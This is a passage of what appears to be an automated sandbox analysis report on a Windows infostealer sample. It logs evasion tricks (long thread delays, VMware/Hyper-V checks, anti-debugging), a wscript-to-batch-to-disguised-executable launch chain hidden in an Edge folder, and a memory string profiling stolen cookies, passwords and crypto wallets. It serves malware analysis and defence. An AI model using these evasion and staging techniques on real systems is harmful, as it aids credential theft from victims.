                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599438Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599313Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599188Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 599063Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598953Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598844Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598719Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598609Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598500Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598391Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598281Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 598125Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 597813Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 3600000Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 597406Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 597016Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 596453Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 596188Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 595969Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 595750Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 595531Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 595250Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 595047Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 594785Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 594578Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 594360Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 594000Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 593688Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 593359Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 593063Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 592594Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 592219Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 591781Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 591422Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 591110Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 590813Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 590406Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 590063Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 589766Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 589500Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 589094Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 588813Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 588281Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 587969Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 587563Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 587328Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 587016Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 586672Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 586250Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585910Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585750Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585594Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585443Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585313Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585188Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 585016Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 584802Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 584672Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 584562Jump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeThread delayed: delay time: 584443Jump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile opened: C:\Users\userJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile opened: C:\Users\user\AppDataJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                    Source: wscript.exe, 00000001.00000003.1705557953.00000000032CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\,
                                    Source: wscript.exe, 00000001.00000003.1705557953.00000000032CF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}s
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2994160012.000000001B1E0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeAPI call chain: ExitProcess graph end nodegraph_0-24883
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess information queried: ProcessInformationJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EAF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EAF838
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EB7DEE mov eax, dword ptr fs:[00000030h]0_2_00EB7DEE
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EBC030 GetProcessHeap,0_2_00EBC030
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeProcess token adjusted: DebugJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EAF838 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EAF838
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EAF9D5 SetUnhandledExceptionFilter,0_2_00EAF9D5
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EAFBCA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00EAFBCA
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EB8EBD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00EB8EBD
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeMemory allocated: page read and write | page guardJump to behavior
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ChainagentComponent\PWC9d9T0TgxIE17d8kEvKaBzSy5sS4bSkqUfKmaENJQQSQ4ECN.vbe" Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ChainagentComponent\q14QT1c6LK4xpgG0MrqndXYweJYHdEecuYXEv1hUkMNQcqj9DhhAaajtNw.bat" "Jump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\ChainagentComponent\ChainFontruntimeCrt.exe "C:\ChainagentComponent/ChainFontruntimeCrt.exe"Jump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\KC0FFSqemJ.bat" Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001Jump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\PING.EXE ping -n 10 localhostJump to behavior
                                    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe "C:\Program Files (x86)\microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe" Jump to behavior
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Application\\117.0.2045.47\\ResiliencyLinks","4Z483_9ES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2995774902.000000001BAF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Files Count (8c96)":"?","Files Groups (8c96)":"?","Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"550","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.1",0,1,"","user","061544","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\microsoft\\Edge\\Application\\117.0.2045.47\\ResiliencyLinks","4Z483_9ES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / N
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002C3F000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerH$
                                    Source: yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.0000000002D83000.00000004.00000800.00020000.00000000.sdmp, yeeQesPXxpnDuwPWqTnUoVbi.exe, 00000009.00000002.2956805434.00000000031AA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [{"Files Count (8c96)":"?","Files Groups (8c96)":"?","Has Crypto Wallets (fff5)":"N","Crypto Extensions (fff5)":"N","Crypto Clients (fff5)":"N","Cookies Count (1671)":"550","Passwords Count (1671)":"0","Forms Count (1671)":"0","CC Count (1671)":"0","History Count (1671)":"?","Has Messengers (1153)":"N","Has Game Clients (1153)":"N","Has Media Clients (1153)":"N","Has FTP Clients (1153)":"N"},"5.0.1",0,1,"","user","061544","Windows 10 Enterprise 64 Bit","Y","Y","N","C:\\Program Files (x86)\\microsoft\\Edge\\Application\\117.0.2045.47\\ResiliencyLinks","4Z483_9ES (1 GB)","Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (Intel64 Family 6 Model 143 Stepping 8)","Program Manager","8.46.123.189","US / United States of America","New York / New York City"," / "]
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: 0_2_00EAF654 cpuid 0_2_00EAF654
                                    Source: C:\Users\user\Desktop\8k1e14tjcx.exeCode function: GetLocaleInfoW,GetNumberFormatW,0_2_00EAAF0F
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeQueries volume information: C:\ChainagentComponent\ChainFontruntimeCrt.exe VolumeInformationJump to behavior
                                    Source: C:\ChainagentComponent\ChainFontruntimeCrt.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exe VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                                    Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\ResiliencyLinks\yeeQesPXxpnDuwPWqTnUoVbi.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
